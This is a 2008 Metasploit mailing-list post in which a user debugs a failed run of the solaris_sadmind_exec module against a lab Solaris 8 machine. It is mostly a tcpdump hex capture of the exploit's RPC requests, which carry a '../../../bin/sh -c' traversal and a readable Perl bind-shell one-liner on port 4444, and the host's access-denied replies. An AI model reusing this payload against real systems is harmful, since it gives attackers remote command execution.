Metasploit mailing list archives
Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec)
From: mail2arthur at gmail.com (arthur zhang)
Date: Wed, 2 Apr 2008 16:17:25 -0400
Thanks. I will check more on the target Solaris. I install from a set of CD's marked as '10/01' so I believe it is vulnerable :) bash-2.03$ showrev -p|grep -c 11 162 bash-2.03$ showrev -p|grep 11645 bash-2.03$ uname -a SunOS nstest1 5.8 Generic_108529-11 i86pc i386 i86pc TCPDUMP from my Kubuntu: 16:00:58.043121 IP 10.15.8.218.32818 > 10.15.10.15.32772: UDP, length 828 0x0000: 4500 0358 86c0 4000 4011 89ce 0a0f 08da E..X.. at .@....... 0x0010: 0a0f 0a0f 8032 8004 0344 2a5c a642 8805 .....2...D*\.B.. 0x0020: 0000 0000 0000 0002 0001 8788 0000 000a ................ 0x0030: 0000 0001 0000 0001 0000 0020 0000 0000 ................ 0x0040: 0000 0009 6c6f 6361 6c68 6f73 7400 0000 ....localhost... 0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0060: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0070: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0080: 0000 0006 0000 0000 0000 0000 0000 0000 ................ 0x0090: 0000 0004 0000 0000 0000 0004 7f00 0001 ................ 0x00a0: 0001 8788 0000 000a 0000 0004 7f00 0001 ................ 0x00b0: 0001 8788 0000 000a 0000 0011 0000 001e ................ 0x00c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x00d0: 0000 0007 416d 6743 7853 6f00 0000 0006 ....AmgCxSo..... 0x00e0: 7379 7374 656d 0000 0000 000f 2e2e 2f2e system......../. 0x00f0: 2e2f 2e2e 2f62 696e 2f73 6800 0000 01aa ./../bin/sh..... 0x0100: 0000 000e 4144 4d5f 4657 5f56 4552 5349 ....ADM_FW_VERSI 0x0110: 4f4e 0000 0000 0003 0000 0004 0000 0001 ON.............. 0x0120: 0000 0000 0000 0000 0000 0008 4144 4d5f ............ADM_ 0x0130: 4c41 4e47 0000 0009 0000 0002 0000 0001 LANG............ 0x0140: 4300 0000 0000 0000 0000 0000 0000 000d C............... 0x0150: 4144 4d5f 5245 5155 4553 5449 4400 0000 ADM_REQUESTID... 0x0160: 0000 0009 0000 0012 0000 0011 3030 3030 ............0000 0x0170: 393a 3030 3030 3030 3030 303a 3000 0000 9:000000000:0... 0x0180: 0000 0000 0000 0000 0000 0009 4144 4d5f ............ADM_ 0x0190: 434c 4153 5300 0000 0000 0009 0000 0007 CLASS........... 0x01a0: 0000 0006 7379 7374 656d 0000 0000 0000 ....system...... 0x01b0: 0000 0000 0000 000e 4144 4d5f 434c 4153 ........ADM_CLAS 0x01c0: 535f 5645 5253 0000 0000 0009 0000 0004 S_VERS.......... 0x01d0: 0000 0003 322e 3100 0000 0000 0000 0000 ....2.1......... 0x01e0: 0000 000a 4144 4d5f 4d45 5448 4f44 0000 ....ADM_METHOD.. 0x01f0: 0000 0009 0000 0010 0000 000f 2e2e 2f2e ............../. 0x0200: 2e2f 2e2e 2f62 696e 2f73 6800 0000 0000 ./../bin/sh..... 0x0210: 0000 0000 0000 0008 4144 4d5f 484f 5354 ........ADM_HOST 0x0220: 0000 0009 0000 0008 0000 0007 416d 6743 ............AmgC 0x0230: 7853 6f00 0000 0000 0000 0000 0000 000f xSo............. 0x0240: 4144 4d5f 434c 4945 4e54 5f48 4f53 5400 ADM_CLIENT_HOST. 0x0250: 0000 0009 0000 0008 0000 0007 416d 6743 ............AmgC 0x0260: 7853 6f00 0000 0000 0000 0000 0000 0011 xSo............. 0x0270: 4144 4d5f 434c 4945 4e54 5f44 4f4d 4149 ADM_CLIENT_DOMAI 0x0280: 4e00 0000 0000 0009 0000 0001 0000 0000 N............... 0x0290: 0000 0000 0000 0000 0000 0011 4144 4d5f ............ADM_ 0x02a0: 5449 4d45 4f55 545f 5041 524d 5300 0000 TIMEOUT_PARMS... 0x02b0: 0000 0009 0000 001c 0000 001b 5454 4c3d ............TTL= 0x02c0: 3020 5054 4f3d 3230 2050 434e 543d 3220 0.PTO=20.PCNT=2. 0x02d0: 5044 4c59 3d33 3000 0000 0000 0000 0000 PDLY=30......... 0x02e0: 0000 0009 4144 4d5f 4645 4e43 4500 0000 ....ADM_FENCE... 0x02f0: 0000 0003 0000 0004 0000 0000 0000 0000 ................ 0x0300: 0000 0000 0000 0001 5800 0000 0000 0009 ........X....... 0x0310: 0000 0003 0000 0002 2d63 0000 0000 0000 ........-c...... 0x0320: 0000 0000 0000 0001 5900 0000 0000 0009 ........Y....... 0x0330: 0000 0005 0000 0004 7472 7565 0000 0000 ........true.... 0x0340: 0000 0000 0000 0010 6e65 746d 6774 5f65 ........netmgt_e 0x0350: 6e64 6f66 6172 6773 ndofargs 16:00:58.050376 IP 10.15.10.15.32772 > 10.15.8.218.32818: UDP, length 332 0x0000: 4500 0168 5cf2 4000 ff11 f68b 0a0f 0a0f E..h\. at ......... 0x0010: 0a0f 08da 8004 8032 0154 aabc a642 8805 .......2.T...B.. 0x0020: 0000 0001 0000 0000 0000 0000 0000 0000 ................ 0x0030: 0000 0000 0000 0002 0000 0170 0000 0125 ...........p...% 0x0040: 5b31 2c31 2c31 5d20 5365 6375 7269 7479 [1,1,1].Security 0x0050: 2065 7863 6570 7469 6f6e 206f 6e20 686f .exception.on.ho 0x0060: 7374 206e 7374 6573 7431 2e20 2055 5345 st.nstest1...USE 0x0070: 5220 4143 4345 5353 2044 454e 4945 442e R.ACCESS.DENIED. 0x0080: 0a54 6865 2072 6f6f 7420 6964 656e 7469 .The.root.identi 0x0090: 7479 2028 3029 726f 6f74 2e6c 6f63 616c ty.(0)root.local 0x00a0: 686f 7374 2077 6173 2072 6563 6569 7665 host.was.receive 0x00b0: 642c 2062 7574 2069 7420 6973 206e 6f74 d,.but.it.is.not 0x00c0: 0a74 6865 2072 6f6f 7420 6964 656e 7469 .the.root.identi 0x00d0: 7479 2076 616c 6964 206f 6e20 7468 6973 ty.valid.on.this 0x00e0: 2073 7973 7465 6d2e 2020 4973 2074 6869 .system...Is.thi 0x00f0: 7320 616e 0a61 7474 656d 7074 2074 6f20 s.an.attempt.to. 0x0100: 6578 6563 7574 6520 6120 7265 6d6f 7465 execute.a.remote 0x0110: 2066 756e 6374 696f 6e20 7768 696c 6520 .function.while. 0x0120: 7275 6e6e 696e 6720 6173 2072 6f6f 743f running.as.root? 0x0130: 0a28 4675 6e63 7469 6f6e 3a20 636c 6173 .(Function:.clas 0x0140: 7320 7379 7374 656d 2032 2e31 206d 6574 s.system.2.1.met 0x0150: 686f 6420 2e2e 2f2e 2e2f 2e2e 2f62 696e hod.../../../bin 0x0160: 2f73 6829 0a00 0000 /sh).... 16:00:58.057590 IP 10.15.8.218.32818 > 10.15.10.15.32772: UDP, length 984 0x0000: 4500 03f4 86c1 4000 4011 8931 0a0f 08da E..... at .@..1.... 0x0010: 0a0f 0a0f 8032 8004 03e0 2af8 4090 7b3e .....2....*. at .{> 0x0020: 0000 0000 0000 0002 0001 8788 0000 000a ................ 0x0030: 0000 0001 0000 0001 0000 0020 0000 0000 ................ 0x0040: 0000 0009 6c6f 6361 6c68 6f73 7400 0000 ....localhost... 0x0050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0060: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0070: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x0080: 0000 0006 0000 0000 0000 0000 0000 0000 ................ 0x0090: 0000 0004 0000 0000 0000 0004 7f00 0001 ................ 0x00a0: 0001 8788 0000 000a 0000 0004 7f00 0001 ................ 0x00b0: 0001 8788 0000 000a 0000 0011 0000 001e ................ 0x00c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0x00d0: 0000 0007 6e73 7465 7374 3100 0000 0006 ....nstest1..... 0x00e0: 7379 7374 656d 0000 0000 000f 2e2e 2f2e system......../. 0x00f0: 2e2f 2e2e 2f62 696e 2f73 6800 0000 0246 ./../bin/sh....F 0x0100: 0000 000e 4144 4d5f 4657 5f56 4552 5349 ....ADM_FW_VERSI 0x0110: 4f4e 0000 0000 0003 0000 0004 0000 0001 ON.............. 0x0120: 0000 0000 0000 0000 0000 0008 4144 4d5f ............ADM_ 0x0130: 4c41 4e47 0000 0009 0000 0002 0000 0001 LANG............ 0x0140: 4300 0000 0000 0000 0000 0000 0000 000d C............... 0x0150: 4144 4d5f 5245 5155 4553 5449 4400 0000 ADM_REQUESTID... 0x0160: 0000 0009 0000 0012 0000 0011 3030 3030 ............0000 0x0170: 393a 3030 3030 3030 3030 303a 3000 0000 9:000000000:0... 0x0180: 0000 0000 0000 0000 0000 0009 4144 4d5f ............ADM_ 0x0190: 434c 4153 5300 0000 0000 0009 0000 0007 CLASS........... 0x01a0: 0000 0006 7379 7374 656d 0000 0000 0000 ....system...... 0x01b0: 0000 0000 0000 000e 4144 4d5f 434c 4153 ........ADM_CLAS 0x01c0: 535f 5645 5253 0000 0000 0009 0000 0004 S_VERS.......... 0x01d0: 0000 0003 322e 3100 0000 0000 0000 0000 ....2.1......... 0x01e0: 0000 000a 4144 4d5f 4d45 5448 4f44 0000 ....ADM_METHOD.. 0x01f0: 0000 0009 0000 0010 0000 000f 2e2e 2f2e ............../. 0x0200: 2e2f 2e2e 2f62 696e 2f73 6800 0000 0000 ./../bin/sh..... 0x0210: 0000 0000 0000 0008 4144 4d5f 484f 5354 ........ADM_HOST 0x0220: 0000 0009 0000 0008 0000 0007 6e73 7465 ............nste 0x0230: 7374 3100 0000 0000 0000 0000 0000 000f st1............. 0x0240: 4144 4d5f 434c 4945 4e54 5f48 4f53 5400 ADM_CLIENT_HOST. 0x0250: 0000 0009 0000 0008 0000 0007 6e73 7465 ............nste 0x0260: 7374 3100 0000 0000 0000 0000 0000 0011 st1............. 0x0270: 4144 4d5f 434c 4945 4e54 5f44 4f4d 4149 ADM_CLIENT_DOMAI 0x0280: 4e00 0000 0000 0009 0000 0001 0000 0000 N............... 0x0290: 0000 0000 0000 0000 0000 0011 4144 4d5f ............ADM_ 0x02a0: 5449 4d45 4f55 545f 5041 524d 5300 0000 TIMEOUT_PARMS... 0x02b0: 0000 0009 0000 001c 0000 001b 5454 4c3d ............TTL= 0x02c0: 3020 5054 4f3d 3230 2050 434e 543d 3220 0.PTO=20.PCNT=2. 0x02d0: 5044 4c59 3d33 3000 0000 0000 0000 0000 PDLY=30......... 0x02e0: 0000 0009 4144 4d5f 4645 4e43 4500 0000 ....ADM_FENCE... 0x02f0: 0000 0003 0000 0004 0000 0000 0000 0000 ................ 0x0300: 0000 0000 0000 0001 5800 0000 0000 0009 ........X....... 0x0310: 0000 0003 0000 0002 2d63 0000 0000 0000 ........-c...... 0x0320: 0000 0000 0000 0001 5900 0000 0000 0009 ........Y....... 0x0330: 0000 00a0 0000 009f 7065 726c 202d 4d49 ........perl.-MI 0x0340: 4f20 2d65 2027 2470 3d66 6f72 6b28 293b O.-e.'$p=fork(); 0x0350: 6578 6974 2c69 6624 703b 7768 696c 6528 exit,if$p;while( 0x0360: 2463 3d6e 6577 2049 4f3a 3a53 6f63 6b65 $c=new.IO::Socke 0x0370: 743a 3a49 4e45 5428 4c6f 6361 6c50 6f72 t::INET(LocalPor 0x0380: 742c 3434 3434 2c52 6575 7365 2c31 2c4c t,4444,Reuse,1,L 0x0390: 6973 7465 6e29 2d3e 6163 6365 7074 297b isten)->accept){ 0x03a0: 247e 2d3e 6664 6f70 656e 2824 632c 7729 $~->fdopen($c,w) 0x03b0: 3b53 5444 494e 2d3e 6664 6f70 656e 2824 ;STDIN->fdopen($ 0x03c0: 632c 7229 3b73 7973 7465 6d24 5f20 7768 c,r);system$_.wh 0x03d0: 696c 653c 3e7d 2700 0000 0000 0000 0000 ile<>}'......... 0x03e0: 0000 0010 6e65 746d 6774 5f65 6e64 6f66 ....netmgt_endof 0x03f0: 6172 6773 args 16:00:58.065047 IP 10.15.10.15.32772 > 10.15.8.218.32818: UDP, length 332 0x0000: 4500 0168 5cf3 4000 ff11 f68a 0a0f 0a0f E..h\. at ......... 0x0010: 0a0f 08da 8004 8032 0154 1d36 4090 7b3e .......2.T.6 at .{> 0x0020: 0000 0001 0000 0000 0000 0000 0000 0000 ................ 0x0030: 0000 0000 0000 0002 0000 0170 0000 0125 ...........p...% 0x0040: 5b31 2c31 2c31 5d20 5365 6375 7269 7479 [1,1,1].Security 0x0050: 2065 7863 6570 7469 6f6e 206f 6e20 686f .exception.on.ho 0x0060: 7374 206e 7374 6573 7431 2e20 2055 5345 st.nstest1...USE 0x0070: 5220 4143 4345 5353 2044 454e 4945 442e R.ACCESS.DENIED. 0x0080: 0a54 6865 2072 6f6f 7420 6964 656e 7469 .The.root.identi 0x0090: 7479 2028 3029 726f 6f74 2e6c 6f63 616c ty.(0)root.local 0x00a0: 686f 7374 2077 6173 2072 6563 6569 7665 host.was.receive 0x00b0: 642c 2062 7574 2069 7420 6973 206e 6f74 d,.but.it.is.not 0x00c0: 0a74 6865 2072 6f6f 7420 6964 656e 7469 .the.root.identi 0x00d0: 7479 2076 616c 6964 206f 6e20 7468 6973 ty.valid.on.this 0x00e0: 2073 7973 7465 6d2e 2020 4973 2074 6869 .system...Is.thi 0x00f0: 7320 616e 0a61 7474 656d 7074 2074 6f20 s.an.attempt.to. 0x0100: 6578 6563 7574 6520 6120 7265 6d6f 7465 execute.a.remote 0x0110: 2066 756e 6374 696f 6e20 7768 696c 6520 .function.while. 0x0120: 7275 6e6e 696e 6720 6173 2072 6f6f 743f running.as.root? 0x0130: 0a28 4675 6e63 7469 6f6e 3a20 636c 6173 .(Function:.clas 0x0140: 7320 7379 7374 656d 2032 2e31 206d 6574 s.system.2.1.met 0x0150: 686f 6420 2e2e 2f2e 2e2f 2e2e 2f62 696e hod.../../../bin 0x0160: 2f73 6829 0a00 0000 /sh).... -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20080402/0379285f/attachment.htm>
Current thread:
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) mmiller at hick.org (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) mmiller at hick.org (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) Daniel Clemens (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) H D Moore (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) arthur zhang (Apr 02)
- Exploit failed: create failed (with solaris/sunrpc/solaris_sadmind_exec) mmiller at hick.org (Apr 02)